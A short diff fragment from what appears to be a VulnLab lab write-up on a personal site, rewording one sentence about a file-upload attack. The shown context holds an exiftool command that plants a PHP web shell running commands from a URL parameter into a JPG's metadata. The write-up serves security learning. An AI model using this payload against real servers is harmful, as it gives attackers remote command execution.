enricocavalli/enricocavalli.github.io/content/writeups/VulnLab/VulnLab writeup.md

         </form>
 ```

-and before uploading a real jpg I inserted a php payload with exiftool:
+and before uploading a real jpg we can insert in it  a PHP payload with exiftool:

 ```bash
 exiftool  -author='<?php system($_GET["cmd"]); ?>' test.jpg